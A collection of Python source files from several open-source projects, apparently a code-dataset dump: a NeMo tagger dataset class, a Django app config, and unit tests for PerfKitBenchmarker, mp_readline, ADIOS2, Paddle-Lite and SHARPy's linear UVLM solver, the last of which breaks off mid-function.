from nemo.collections.nlp.data.text_normalization_as_tagging.bert_example import BertExampleBuilder, read_input_file
from nemo.core.classes.dataset import Dataset
from nemo.core.neural_types import ChannelType, IntType, LabelsType, MaskType, NeuralType
__all__ = ["ThutmoseTaggerDataset", "ThutmoseTaggerTestDataset"]
class ThutmoseTaggerDataset(Dataset):
"""
Dataset as used by the ThutmoseTaggerModel for training, validation, and inference
pipelines.
Args:
input_file (str): path to tsv-file with data
example_builder: instance of BertExampleBuilder
"""
@property
def output_types(self) -> Optional[Dict[str, NeuralType]]:
"""Returns definitions of module output ports.
"""
return {
"input_ids": NeuralType(('B', 'T'), ChannelType()),
"input_mask": NeuralType(('B', 'T'), MaskType()),
"segment_ids": NeuralType(('B', 'T'), ChannelType()),
"labels_mask": NeuralType(('B', 'T'), MaskType()),
"tag_labels": NeuralType(('B', 'T'), LabelsType()),
"semiotic_labels": NeuralType(('B', 'T'), LabelsType()),
"semiotic_spans": NeuralType(('B', 'T', 'C'), IntType()),
}
def __init__(self, input_file: str, example_builder: BertExampleBuilder) -> None:
self.examples = read_input_file(example_builder, input_file, infer=False)
def __len__(self):
return len(self.examples)
def __getitem__(self, idx: int):
input_ids = np.array(self.examples[idx].features["input_ids"])
input_mask = np.array(self.examples[idx].features["input_mask"])
segment_ids = np.array(self.examples[idx].features["segment_ids"])
labels_mask = np.array(self.examples[idx].features["labels_mask"])
tag_labels = np.array(self.examples[idx].features["tag_labels"])
semiotic_labels = np.array(self.examples[idx].features["semiotic_labels"])
semiotic_spans = np.array(self.examples[idx].features["semiotic_spans"])
return input_ids, input_mask, segment_ids, labels_mask, tag_labels, semiotic_labels, semiotic_spans
class ThutmoseTaggerTestDataset(Dataset):
"""
Dataset for inference pipeline.
Args:
sents: list of strings
example_builder: instance of BertExampleBuilder
"""
@property
def output_types(self) -> Optional[Dict[str, NeuralType]]:
"""Returns definitions of module output ports.
"""
return {
"input_ids": NeuralType(('B', 'T'), ChannelType()),
"input_mask": NeuralType(('B', 'T'), MaskType()),
"segment_ids": NeuralType(('B', 'T'), ChannelType()),
}
def __init__(self, sents: List[str], example_builder: BertExampleBuilder) -> None:
self.examples = []
for source in sents:
example = example_builder.build_bert_example(source, infer=True)
if example is None:
raise ValueError("Cannot build example from: " + source)
self.examples.append(example)
def __len__(self):
return len(self.examples)
def __getitem__(self, idx: int):
input_ids = np.array(self.examples[idx].features["input_ids"])
input_mask = np.array(self.examples[idx].features["input_mask"])
segment_ids = np.array(self.examples[idx].features["segment_ids"])
return input_ids, input_mask, segment_ids
|
dcd9144ebea0ba875871699cdac5b4dc5813d923
|
b3950a2a6912c9b494d22b9353322c3357df0110
|
/tock/tock/apps.py
|
2f83c7883915590f4cb3e8bfb62fce9be3663333
|
[
"CC0-1.0",
"LicenseRef-scancode-public-domain",
"MIT"
] |
permissive
|
18F/tock
|
df1fa5e817e690ce0bff315a15799e2f78915882
|
99005d8f6c4605a69fbb620c41f38447ecbee459
|
refs/heads/main
| 2023-08-31T01:34:55.299577
| 2023-08-23T18:49:10
| 2023-08-23T18:49:10
| 30,162,008
| 135
| 50
|
NOASSERTION
| 2023-09-07T18:40:30
| 2015-02-01T22:19:32
|
Python
|
UTF-8
|
Python
| false
| false
| 166
|
py
|
apps.py
|
from django.apps import AppConfig
from .signals import setup_signals
class TockAppConfig(AppConfig):
name = "tock"
def ready(self):
setup_signals()
|
22fee79bfbecf2a6f0056dd95ec96be51234d174
|
ecaba173879f92f24e3c951866fda23c0a4fc426
|
/tests/linux_benchmarks/large_scale_boot_benchmark_test.py
|
9e583f2a030f7ffc964fe96d2bdf37deae8d38e2
|
[
"Classpath-exception-2.0",
"BSD-3-Clause",
"AGPL-3.0-only",
"MIT",
"GPL-2.0-only",
"Apache-2.0",
"LicenseRef-scancode-public-domain",
"BSD-2-Clause"
] |
permissive
|
GoogleCloudPlatform/PerfKitBenchmarker
|
2f4917fd796db4eb90822c557d8fa08a497fbd48
|
d0699f32998898757b036704fba39e5471641f01
|
refs/heads/master
| 2023-09-02T08:14:54.110308
| 2023-09-01T20:28:01
| 2023-09-01T20:28:38
| 21,950,910
| 1,923
| 567
|
Apache-2.0
| 2023-09-13T22:37:42
| 2014-07-17T17:23:26
|
Python
|
UTF-8
|
Python
| false
| false
| 5,453
|
py
|
large_scale_boot_benchmark_test.py
|
# Copyright 2018 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for large scale boot benchmark."""
import copy
import unittest
from absl import flags
import mock
from perfkitbenchmarker import errors
from perfkitbenchmarker import sample
from perfkitbenchmarker.linux_benchmarks import large_scale_boot_benchmark
from tests import pkb_common_test_case
FLAGS = flags.FLAGS
class LargeScaleBootBenchmarkTest(pkb_common_test_case.PkbCommonTestCase):
@mock.patch.object(
large_scale_boot_benchmark, '_GetExpectedBoots', return_value=4)
def testWaitForResponsesSuccess(self, mock_func):
vm1 = mock.Mock()
vm1.RemoteCommand.side_effect = [('', ''), ('2', '')]
vm2 = mock.Mock()
vm2.RemoteCommand.side_effect = [('', ''), ('2', '')]
large_scale_boot_benchmark._WaitForResponses([vm1, vm2])
vm1.RemoteCommand.assert_called_with(
'grep -c Pass /tmp/pkb/results', ignore_failure=True)
vm2.RemoteCommand.assert_called_with(
'grep -c Pass /tmp/pkb/results', ignore_failure=True)
@mock.patch.object(
large_scale_boot_benchmark, '_GetExpectedBoots', return_value=4)
def testWaitForResponsesDeadServer(self, mock_func):
vm1 = mock.Mock()
vm1.RemoteCommand.side_effect = [('Error: Failed', ''), ('2', '')]
with self.assertRaises(errors.Benchmarks.RunError):
large_scale_boot_benchmark._WaitForResponses([vm1])
@mock.patch.object(
large_scale_boot_benchmark, '_GetExpectedBoots', return_value=5)
def testWaitForResponsesTwice(self, mock_func):
vm1 = mock.Mock()
vm1.RemoteCommand.side_effect = [
('', ''), ('2', ''), ('', ''), ('5', '')]
large_scale_boot_benchmark._WaitForResponses([vm1])
self.assertEqual(vm1.RemoteCommand.call_count, 4)
def testParseResult(self):
FLAGS['num_vms'].value = 2
FLAGS['boots_per_launcher'].value = 3
FLAGS['zone'].value = 'zone'
vm1 = mock.Mock()
vm1.RemoteCommand.side_effect = [('6', ''),
('Pass:a:8\nPass:b:9\nPass:c:13', '')]
vm1.zone = 'zone'
vm2 = mock.Mock()
vm2.RemoteCommand.side_effect = [('2', ''),
('Pass:d:4\nFail:e:5\nPass:f:6', '')]
vm2.zone = 'zone'
results = large_scale_boot_benchmark._ParseResult([vm1, vm2])
common_metadata = {
'cloud': 'GCP',
'num_launchers': 2,
'expected_boots_per_launcher': 3,
'boot_os_type': 'debian11',
'boot_machine_type': 'n1-standard-2',
'launcher_machine_type': 'n1-standard-16',
'vms_contact_launcher': True,
'use_public_ip': False,
}
metadata1 = copy.deepcopy(common_metadata)
metadata1.update({
'zone': 'zone',
'launcher_successes': 3,
'launcher_boot_durations_ns': [2, 3, 7],
'launcher_closed_incoming': 0
})
metadata2 = copy.deepcopy(common_metadata)
metadata2.update({
'zone': 'zone',
'launcher_successes': 2,
'launcher_boot_durations_ns': [2, 4],
'launcher_closed_incoming': 1
})
expected = [
sample.Sample(
metric='Launcher Boot Details',
value=-1,
unit='',
metadata=metadata1),
sample.Sample(
metric='Launcher Boot Details',
value=-1,
unit='',
metadata=metadata2),
sample.Sample(
metric='Cluster Max Boot Time',
value=7,
unit='nanoseconds',
metadata=common_metadata),
sample.Sample(
metric='Cluster Max Boot Sec',
value=0.000000007,
unit='seconds',
metadata=common_metadata),
sample.Sample(
metric='Cluster Mean Boot Sec',
value=0.000000003,
unit='seconds',
metadata=common_metadata),
sample.Sample(
metric='Cluster Median Boot Sec',
value=0.000000003,
unit='seconds',
metadata=common_metadata),
sample.Sample(
metric='Cluster Expected Boots',
value=6,
unit='',
metadata=common_metadata),
sample.Sample(
metric='Cluster Success Boots', value=5, unit='',
metadata=common_metadata)
]
for result, expected in zip(results, expected):
self.assertEqual(result.metric, expected.metric,
'Metric name for {} is not equal.'.format(
expected.metric))
self.assertEqual(result.value, expected.value,
'Metric value for {} is not equal.'.format(
expected.metric))
self.assertDictEqual(result.metadata, expected.metadata,
'Metadata for {} is not equal'.format(
expected.metric))
if __name__ == '__main__':
unittest.main()
|
5e78d478dc2be5ae6c1efc5a2da8a0194192f357
|
75762795be601735f4a5ae80f39ea93ae597b8c1
|
/mp_readline/test.py
|
ef9be6c268d24989adf5a9481f298c3a45f41da4
|
[
"MIT"
] |
permissive
|
leffss/devops
|
49a60792d2fdbf5152a3db8021185c0b7bff336d
|
dd590c8bada955f27562a0881ad3445442958f86
|
refs/heads/master
| 2023-04-07T01:24:53.052233
| 2022-08-09T09:15:49
| 2022-08-09T09:15:49
| 199,561,033
| 372
| 162
|
MIT
| 2023-03-31T14:55:52
| 2019-07-30T02:39:28
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 729
|
py
|
test.py
|
#!/usr/bin/env python3
"""Test cases for mp_readline"""
import mp_readline
mp_readline.TESTING = True
rl = mp_readline.MpReadline()
if __name__ == "__main__":
input1 = b'free asd\x08\x08\x08\x08\x08\x08\x08\x08pp\x1b[K\x08\x08free asd\x08\x08\x08\x08\x08\x08\x08\x08pp\x1b[K\x08\x08sk\x08\x08vim xasd\x08\x08\x08\x08\x08\x08\x08\x08\x1b[1Pfree -m'
input = b'pp\x1b[K\x08\x08pp\x1b[K\x08\x08\x1b[1Pfree -m'
inputx = b'pp\x1b[K\x08\x08\x1b[1Pfree -m'
# \x1b[1
xx = b'free -m\x08\x08\x08\x08\x08\x08\x08\x1b[5Pls -l\x08\x08\x08\x08\x08free -m\x08\x08asd\x08\x08\x08\x08\x08\x08\x08\x08pp\x1b[K'
yy = 'pp'
real = 'free -m'
a = rl.process_line(xx)
print(a)
x = 1
y = 2
print(x, y)
|
2365cd8bac63cda5e797bb925c7510375f072d6e
|
bdc27c22522a99b5bff2ec4cfa95fadcba65747d
|
/testing/adios2/bindings/python/TestBPPNGHighLevelAPI.py
|
fc3588b8f4c996aa0c4f385bdd30134118db612d
|
[
"Apache-2.0"
] |
permissive
|
ornladios/ADIOS2
|
a34e257b28adb26e6563b800502266ebb0c9088c
|
c8b7b66ed21b03bfb773bd972d5aeaaf10231e67
|
refs/heads/master
| 2023-08-31T18:11:22.186415
| 2023-08-29T20:45:03
| 2023-08-29T20:45:03
| 75,750,830
| 243
| 140
|
Apache-2.0
| 2023-09-14T11:15:00
| 2016-12-06T16:39:55
|
C++
|
UTF-8
|
Python
| false
| false
| 2,480
|
py
|
TestBPPNGHighLevelAPI.py
|
#!/usr/bin/env python
#
# Distributed under the OSI-approved Apache License, Version 2.0. See
# accompanying file Copyright.txt for details.
#
# TestBPPNGHighLevelAPI.py
#
# Created on: June 7th, 2019
# Author: William F Godoy
import numpy as np
import random
from mpi4py import MPI
import adios2
def CompressPNG(compression_level):
fname = "BPWRPNG_" + str(compression_level) + "_py.bp"
Nx = 10
Ny = 50
channels = 3
NSteps = 1
# initialize values
u32s = np.zeros([Nx, Ny], np.uint32)
u8s = np.zeros([Nx, Ny, channels], np.uint8)
value_ji = 0.
for i in range(0, Nx):
for j in range(0, Ny):
u32s[i][j] = value_ji
u8s[i][j][0] = random.randrange(256)
u8s[i][j][1] = random.randrange(256)
u8s[i][j][2] = random.randrange(256)
value_ji += 1.
# set global dimensions
# MPI
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
size = comm.Get_size()
shape3D = [Nx * size, Ny, 3]
start3D = [Nx * rank, 0, 0]
count3D = [Nx, Ny, 3]
shape2D = [Nx * size, Ny]
start2D = [Nx * rank, 0]
count2D = [Nx, Ny]
# writer
with adios2.open(fname, "w", comm) as fw:
for s in range(0, NSteps):
fw.write("u8", u8s, shape3D, start3D, count3D,
[('PNG', {'bit_depth': '8',
'color_type': 'PNG_COLOR_TYPE_RGB',
'compression_level': str(compression_level)})])
fw.write("u32", u32s, shape2D, start2D, count2D,
[('PNG', {'bit_depth': '8',
'color_type': 'PNG_COLOR_TYPE_RGBA',
'compression_level': str(compression_level)})],
end_step=True)
# reader
with adios2.open(fname, "r", comm) as fr:
for fstep in fr:
in_u8s = fstep.read("u8", start3D, count3D)
in_u32s = fstep.read("u32", start2D, count2D)
for i in range(0, Nx):
for j in range(0, Ny):
assert (u32s[i][j] == in_u32s[i][j])
assert (u8s[i][j][0] == in_u8s[i][j][0])
assert (u8s[i][j][1] == in_u8s[i][j][1])
assert (u8s[i][j][2] == in_u8s[i][j][2])
def main():
CompressPNG(compression_level=1)
CompressPNG(compression_level=4)
CompressPNG(compression_level=9)
if __name__ == "__main__":
main()
|
2e72879983a74cf407f77b1c10ec56e87a372198
|
d17a8870ff8ac77b82d0d37e20c85b23aa29ca74
|
/lite/tests/unittest_py/op/common/test_beam_search_decode_op_base.py
|
1985632bd27a1ecf8a596207cb6fe84913cdb893
|
[
"Apache-2.0"
] |
permissive
|
PaddlePaddle/Paddle-Lite
|
4ab49144073451d38da6f085a8c56822caecd5b2
|
e241420f813bd91f5164f0d9ee0bc44166c0a172
|
refs/heads/develop
| 2023-09-02T05:28:14.017104
| 2023-09-01T10:32:39
| 2023-09-01T10:32:39
| 104,208,128
| 2,545
| 1,041
|
Apache-2.0
| 2023-09-12T06:46:10
| 2017-09-20T11:41:42
|
C++
|
UTF-8
|
Python
| false
| false
| 2,371
|
py
|
test_beam_search_decode_op_base.py
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
sys.path.append('..')
from program_config import TensorConfig, ProgramConfig, OpConfig, CxxConfig, TargetType, PrecisionType, DataLayoutType, Place
import numpy as np
from functools import partial
from typing import Optional, List, Callable, Dict, Any, Set
import unittest
import hypothesis
import hypothesis.strategies as st
from hypothesis import assume
def sample_program_configs(draw):
in_shape = draw(st.sampled_from([[5, 1]]))
lod_data = draw(st.sampled_from([[[0, 1, 2], [0, 2, 4]]]))
def generate_pre_ids(*args, **kwargs):
return np.random.random(in_shape).astype(np.int64)
def generate_pre_score(*args, **kwargs):
return np.random.random(in_shape).astype(np.float32)
beam_search_ops = OpConfig(
type="beam_search_decode",
inputs={
"Ids": ["ids_data", "ids_data2"],
"Scores": ["scores_data", "scores_data2"]
},
outputs={
"SentenceIds": ["sentence_ids_data"],
"SentenceScores": ["sentence_scores_data"]
},
attrs={"beam_size": in_shape[0],
"end_id": 0})
program_config = ProgramConfig(
ops=[beam_search_ops],
weights={},
inputs={
"ids_data": TensorConfig(
data_gen=partial(generate_pre_ids), lod=lod_data),
"ids_data2": TensorConfig(
data_gen=partial(generate_pre_ids), lod=lod_data),
"scores_data": TensorConfig(
data_gen=partial(generate_pre_score), lod=lod_data),
"scores_data2": TensorConfig(
data_gen=partial(generate_pre_score), lod=lod_data),
},
outputs=["sentence_ids_data", "sentence_scores_data"])
return program_config
|
e692c1d12af004b80fefc0e4ffd1172a60794675
|
26060f5ea4d7efee2d03cbbd0b49c099e0f5f38a
|
/tests/linear/uvlm/test_infinite_span.py
|
70a857e4cdfa90342a52668b553230b705ef137b
|
[
"BSD-3-Clause"
] |
permissive
|
ImperialCollegeLondon/sharpy
|
0fcd1fba9ed2181dabc1124f9800aa75521bfc3d
|
58ddceb985bef13af3ea199a1764c8dc9b088907
|
refs/heads/main
| 2023-08-19T03:04:26.044857
| 2023-07-17T07:05:06
| 2023-07-17T07:05:06
| 70,235,936
| 106
| 55
|
BSD-3-Clause
| 2023-08-16T02:27:58
| 2016-10-07T10:11:51
|
Python
|
UTF-8
|
Python
| false
| false
| 19,018
|
py
|
test_infinite_span.py
|
"""Linearised UVLM 2D tests
Test linear UVLM solver against analytical results for 2D wing
Author: S. Maraniello, Dec 2018
Modified: N. Goizueta, Sep 2019
"""
import unittest
import os
# import matplotlib.pyplot as plt
import numpy as np
import shutil
import sharpy.sharpy_main
import sharpy.utils.algebra as algebra
import sharpy.utils.analytical as an
import sharpy.linear.src.linuvlm as linuvlm
import sharpy.cases.templates.flying_wings as flying_wings
import sharpy.utils.sharpydir as sharpydir
import sharpy.utils.cout_utils as cout
class Test_infinite_span(unittest.TestCase):
"""
Test infinite-span flat wing at zero incidence against analytical solutions
"""
test_dir = sharpydir.SharpyDir + '/tests/linear/uvlm/'
def setUp_from_params(self, Nsurf, integr_ord, RemovePred, UseSparse, RollNodes):
"""
Builds SHARPy solution for a rolled infinite span flat wing at zero
incidence. Rolling can be obtained both by rotating the FoR A or
modifying the nodes of the wing.
"""
# Flags
self.ProducePlots = True
# Define Parametrisation
M, N, Mstar_fact = 8, 8, 50
# Flying properties
if RollNodes:
self.Roll0Deg = 0.
else:
self.Roll0Deg = 0.
self.Alpha0Deg = 0.0
Uinf0 = 50.
### ----- build directories
self.case_code = 'wagner'
self.case_main = self.case_code + \
'_r%.4daeff%.2d_rnodes%s_Nsurf%.2dM%.2dN%.2dwk%.2d' \
% (int(np.round(100 * self.Roll0Deg)),
int(np.round(100 * self.Alpha0Deg)),
RollNodes, Nsurf, M, N, Mstar_fact)
self.case_main += 'ord%.1d_rp%s_sp%s' % (integr_ord, RemovePred, UseSparse)
self.route_test_dir = os.path.abspath(os.path.dirname(os.path.realpath(__file__)))
route_main = self.route_test_dir + '/res/'
self.figfold = self.route_test_dir + '/figs/'
if os.path.exists(route_main):
shutil.rmtree(route_main)
if os.path.exists(self.figfold):
shutil.rmtree(self.figfold)
os.makedirs(route_main)
os.makedirs(self.figfold)
### ----- sharpy reference solution
# Build wing model
ws = flying_wings.QuasiInfinite(
M=M, N=N, Mstar_fact=Mstar_fact, n_surfaces=Nsurf,
u_inf=Uinf0, alpha=self.Alpha0Deg, roll=self.Roll0Deg,
aspect_ratio=1e5, RollNodes=RollNodes,
route=route_main, case_name=self.case_main)
ws.main_ea = .4
ws.clean_test_files()
ws.update_derived_params()
ws.generate_fem_file()
ws.generate_aero_file()
# solution flow
ws.set_default_config_dict()
ws.config['SHARPy']['flow'] = ['BeamLoader', 'AerogridLoader', 'StaticUvlm', 'BeamPlot', 'AerogridPlot']
ws.config['SHARPy']['log_folder'] = self.route_test_dir + '/output/' + self.case_code + '/'
ws.config['SHARPy']['write_screen'] = 'off'
ws.config['SHARPy']['write_log'] = 'off'
ws.config['LinearUvlm'] = {'dt': ws.dt,
'integr_order': integr_ord,
'density': ws.rho,
'remove_predictor': RemovePred,
'use_sparse': UseSparse,
'ScalingDict': {'length': 1.,
'speed': 1.,
'density': 1.},
'vortex_radius': 1e-6}
ws.config.write()
# solve at linearistion point
data0 = sharpy.sharpy_main.main(['...', route_main + self.case_main + '.sharpy'])
tsaero0 = data0.aero.timestep_info[0]
tsaero0.rho = ws.config['LinearUvlm']['density']
### ---- normalisation parameters
self.start_writer()
# verify chord
c_ext = np.linalg.norm(tsaero0.zeta[0][:, 0, 0] - tsaero0.zeta[0][:, -1, 0])
assert np.abs(ws.c_ref - c_ext) < 1e-8, 'Wrong reference chord'
# reference force - total
qinf = 0.5 * ws.rho * Uinf0 ** 2
span = Nsurf * np.linalg.norm(tsaero0.zeta[0][:, 0, 0] - tsaero0.zeta[0][:, 0, -1])
Stot = ws.c_ref * span
Fref_tot = qinf * Stot
# reference force - section
sec_span = np.linalg.norm(tsaero0.zeta[0][:, 0, 0] - tsaero0.zeta[0][:, 0, 1])
S = ws.c_ref * sec_span
Fref_span = qinf * S
# save
self.route_main = route_main
self.tsaero0 = tsaero0
self.ws = ws
self.Fref_tot = Fref_tot
self.Fref_span = Fref_span
self.M = M
self.N = N
self.Mstar_fact = Mstar_fact
self.Uinf0 = Uinf0
def test_wagner(self):
"""
Step response (Wagner):
- set linearisation point at 0 effective incidence but non-zero roll
attitude. This can be obtained either by rotating the FoR A or
by explicitely modifying the position of the wing nodes.
- perturb. state so as to produce a small effective angle of attack.
This is achieved combining changes of:
- wing lattice orientation
- wing lattice speed
- incoming flow orientation
- compare aerodynamic force time history to Wagner's analytical solution
- compare steady state to analytical solution and ``StaticUvlm`` solver
Notes:
The function uses ``subTests`` to call ``run_wagner``.
"""
for Nsurf in [1, 2]:
for integr_ord in [1, 2]:
for RemovePred in [False, True]:
for UseSparse in [True]:
for RollNodes in [True, False]:
with self.subTest(
Nsurf=Nsurf, integr_ord=integr_ord,
RemovePred=RemovePred, UseSparse=UseSparse,
RollNodes=RollNodes):
self.run_wagner(
Nsurf, integr_ord, RemovePred, UseSparse, RollNodes)
def run_wagner(self, Nsurf, integr_ord, RemovePred, UseSparse, RollNodes):
"""
see test_wagner
"""
### ----- set reference solution
self.setUp_from_params(Nsurf, integr_ord, RemovePred, UseSparse, RollNodes)
tsaero0 = self.tsaero0
ws = self.ws
M = self.M
N = self.N
Mstar_fact = self.Mstar_fact
Uinf0 = self.Uinf0
### ----- linearisation
uvlm = linuvlm.Dynamic(tsaero0,
dynamic_settings=ws.config['LinearUvlm'])
uvlm.assemble_ss()
zeta_pole = np.array([0., 0., 0.])
uvlm.get_total_forces_gain(zeta_pole=zeta_pole)
uvlm.get_rigid_motion_gains(zeta_rotation=zeta_pole)
uvlm.get_sect_forces_gain()
### ----- Scale gains
Fref_tot = self.Fref_tot
Fref_span = self.Fref_span
uvlm.Kftot = uvlm.Kftot / Fref_tot
uvlm.Kmtot = uvlm.Kmtot / Fref_tot / ws.c_ref
uvlm.Kfsec /= Fref_span
uvlm.Kmsec /= (Fref_span * ws.c_ref)
### ----- step input
# rotate incoming flow, wing lattice and wing lattice speed about
# the (rolled) wing elastic axis to create an effective angle of attack.
# Rotation is expressed through a CRV.
delta_AlphaEffDeg = 1e-2
delta_AlphaEffRad = 1e-2 * np.pi / 180.
Roll0Rad = self.Roll0Deg / 180. * np.pi
dcrv = -delta_AlphaEffRad * np.array([0., np.cos(Roll0Rad), np.sin(Roll0Rad)])
uvec0 = np.array([Uinf0, 0, 0])
uvec = np.dot(algebra.crv2rotation(dcrv), uvec0)
duvec = uvec - uvec0
dzeta = np.zeros((Nsurf, 3, M + 1, N // Nsurf + 1))
dzeta_dot = np.zeros((Nsurf, 3, M + 1, N // Nsurf + 1))
du_ext = np.zeros((Nsurf, 3, M + 1, N // Nsurf + 1))
for ss in range(Nsurf):
for mm in range(M + 1):
for nn in range(N // Nsurf + 1):
dzeta_dot[ss, :, mm, nn] = -1. / 3 * duvec
du_ext[ss, :, mm, nn] = +1. / 3 * duvec
dzeta = 1. / 3 * np.dot(uvlm.Krot, dcrv)
Uaero = np.concatenate((dzeta.reshape(-1),
dzeta_dot.reshape(-1),
du_ext.reshape(-1)))
### ----- Steady state solution
xste, yste = uvlm.solve_steady(Uaero)
Ftot_ste = np.dot(uvlm.Kftot, yste)
Mtot_ste = np.dot(uvlm.Kmtot, yste)
# first check of gain matrices...
Ftot_ste_ref = np.zeros((3,))
Mtot_ste_ref = np.zeros((3,))
fnodes = yste.reshape((Nsurf, 3, M + 1, N // Nsurf + 1))
for ss in range(Nsurf):
for nn in range(N // Nsurf + 1):
for mm in range(M + 1):
Ftot_ste_ref += fnodes[ss, :, mm, nn]
Mtot_ste_ref += np.cross(
uvlm.MS.Surfs[ss].zeta[:, mm, nn], fnodes[ss, :, mm, nn])
Ftot_ste_ref /= Fref_tot
Mtot_ste_ref /= (Fref_tot * ws.c_ref)
Fmag = np.linalg.norm(Ftot_ste_ref)
er_f = np.max(np.abs(Ftot_ste - Ftot_ste_ref)) / Fmag
er_m = np.max(np.abs(Mtot_ste - Mtot_ste_ref)) / Fmag / ws.c_ref
assert (er_f < 1e-8 and er_m < 1e-8), \
'Error of total forces (%.2e) and moment (%.2e) too large!' % (er_f, er_m) + \
'Verify gains produced by linuvlm.Dynamic.get_total_forces_gain.'
# then compare against analytical ...
Cl_inf = delta_AlphaEffRad * np.pi * 2.
Cfvec_inf = Cl_inf * np.array([0., -np.sin(Roll0Rad), np.cos(Roll0Rad)])
er_f = np.abs(np.linalg.norm(Ftot_ste) / Cl_inf - 1.)
assert (er_f < 1e-2), \
'Error of total lift coefficient (%.2e) too large!' % (er_f,) + \
'Verify linuvlm.Dynamic.'
er_f = np.abs(np.linalg.norm(Ftot_ste - Cfvec_inf) / Cl_inf)
assert (er_f < 1e-2), \
'Error of total aero force (%.2e) too large!' % (er_f,) + \
'Verify linuvlm.Dynamic.'
# ... and finally compare against non-linear UVLM
# ps: here we roll the wing and rotate the incoming flow to generate an effective
# angle of attack
case_pert = 'wagner_r%.4daeff%.2d_rnodes%s_Nsurf%.2dM%.2dN%.2dwk%.2d' \
% (int(np.round(100 * self.Roll0Deg)),
int(np.round(100 * delta_AlphaEffDeg)),
RollNodes,
Nsurf, M, N, Mstar_fact)
ws_pert = flying_wings.QuasiInfinite(
M=M, N=N, Mstar_fact=Mstar_fact, n_surfaces=Nsurf,
u_inf=Uinf0,
alpha=self.Alpha0Deg,
roll=self.Roll0Deg,
aspect_ratio=1e5,
route=self.route_main,
case_name=case_pert,
RollNodes=RollNodes)
ws_pert.u_inf_direction = uvec / Uinf0
ws_pert.main_ea = ws.main_ea
ws_pert.clean_test_files()
ws_pert.update_derived_params()
ws_pert.generate_fem_file()
ws_pert.generate_aero_file()
# solution flow
ws_pert.set_default_config_dict()
ws_pert.config['SHARPy']['flow'] = ws.config['SHARPy']['flow']
ws_pert.config['SHARPy']['write_screen'] = 'off'
ws_pert.config['SHARPy']['write_log'] = 'off'
ws_pert.config['SHARPy']['log_folder'] = self.route_test_dir + '/output/' + self.case_code + '/'
ws_pert.config.write()
# solve at perturbed point
data_pert = sharpy.sharpy_main.main(['...', self.route_main + case_pert + '.sharpy'])
tsaero = data_pert.aero.timestep_info[0]
self.start_writer()
# get total forces
Ftot_ste_pert = np.zeros((3,))
Mtot_ste_pert = np.zeros((3,))
for ss in range(Nsurf):
for nn in range(N // Nsurf + 1):
for mm in range(M + 1):
Ftot_ste_pert += tsaero.forces[ss][:3, mm, nn]
Mtot_ste_pert += np.cross(
uvlm.MS.Surfs[ss].zeta[:, mm, nn], tsaero.forces[ss][:3, mm, nn])
Ftot_ste_pert /= Fref_tot
Mtot_ste_pert /= (Fref_tot * ws.c_ref)
Fmag = np.linalg.norm(Ftot_ste_pert)
er_f = np.max(np.abs(Ftot_ste - Ftot_ste_pert)) / Fmag
er_m = np.max(np.abs(Mtot_ste - Mtot_ste_pert)) / Fmag / ws.c_ref
assert (er_f < 2e-4 and er_m < 2e-4), \
'Error of total forces (%.2e) and moment (%.2e) ' % (er_f, er_m) + \
'with respect to geometrically-exact UVLM too large!'
# and check non-linear uvlm against analytical solution
er_f = np.abs(np.linalg.norm(Ftot_ste_pert - Cfvec_inf) / Cl_inf)
assert (er_f <= 1.5e-2), \
'Error of total aero force components (%.2e) too large!' % (er_f,) + \
'Verify StaticUvlm'
### ----- Analytical step response (Wagner solution)
NT = 251
tv = np.linspace(0., uvlm.dt * (NT - 1), NT)
Clv_an = an.wagner_imp_start(delta_AlphaEffRad, Uinf0, ws.c_ref, tv)
assert np.abs(Clv_an[-1] / Cl_inf - 1.) < 1e-2, \
'Did someone modify this test case?! The time should be enough to reach ' \
'the steady-state CL with a 1 perc. tolerance...'
Cfvec_an = np.zeros((NT, 3))
Cfvec_an[:, 1] = -np.sin(Roll0Rad) * Clv_an
Cfvec_an[:, 2] = np.cos(Roll0Rad) * Clv_an
### ----- Dynamic step response
Fsect = np.zeros((NT, Nsurf, 3, N // Nsurf + 1))
# Fbeam=np.zeros((NT,6,N//Nsurf+1))
Ftot = np.zeros((NT, 3))
Er_f_tot = np.zeros((NT,))
# Ybeam=[]
gamma = np.zeros((NT, Nsurf, M, N // Nsurf))
gamma_dot = np.zeros((NT, Nsurf, M, N // Nsurf))
gamma_star = np.zeros((NT, Nsurf, int(M * Mstar_fact), N // Nsurf))
xold = np.zeros((uvlm.SS.A.shape[0],))
for tt in range(1, NT):
xnew, ynew = uvlm.solve_step(xold, Uaero)
change = np.linalg.norm(xnew - xold)
xold = xnew
# record state ?
if uvlm.remove_predictor is False:
gv, gvstar, gvdot = uvlm.unpack_state(xnew)
gamma[tt, :, :, :] = gv.reshape((Nsurf, M, N // Nsurf))
gamma_dot[tt, :, :, :] = gvdot.reshape((Nsurf, M, N // Nsurf))
gamma_star[tt, :, :, :] = gvstar.reshape((Nsurf, int(M * Mstar_fact), N // Nsurf))
# calculate forces (and error)
Ftot[tt, :3] = np.dot(uvlm.Kftot, ynew)
Er_f_tot[tt] = np.linalg.norm(Ftot[tt, :] - Cfvec_an[tt, :]) / Clv_an[tt]
Fsect[tt, :, :, :] = np.dot(uvlm.Kfsec, ynew).reshape((Nsurf, 3, N // Nsurf + 1))
# ### beam forces
# Ybeam.append(np.dot(Sol.Kforces[:-10,:],ynew))
# Fdummy=Ybeam[-1].reshape((N//Nsurf,6)).T
# Fbeam[tt,:,:N//Nsurf]=Fdummy[:,:N//Nsurf]
# Fbeam[tt,:,N//Nsurf+1:]=Fdummy[:,N//Nsurf:]
if RemovePred:
ts2perc, ts1perc = 6, 6
else:
ts2perc, ts1perc = 16, 36
er_th_2perc = np.max(Er_f_tot[ts2perc:])
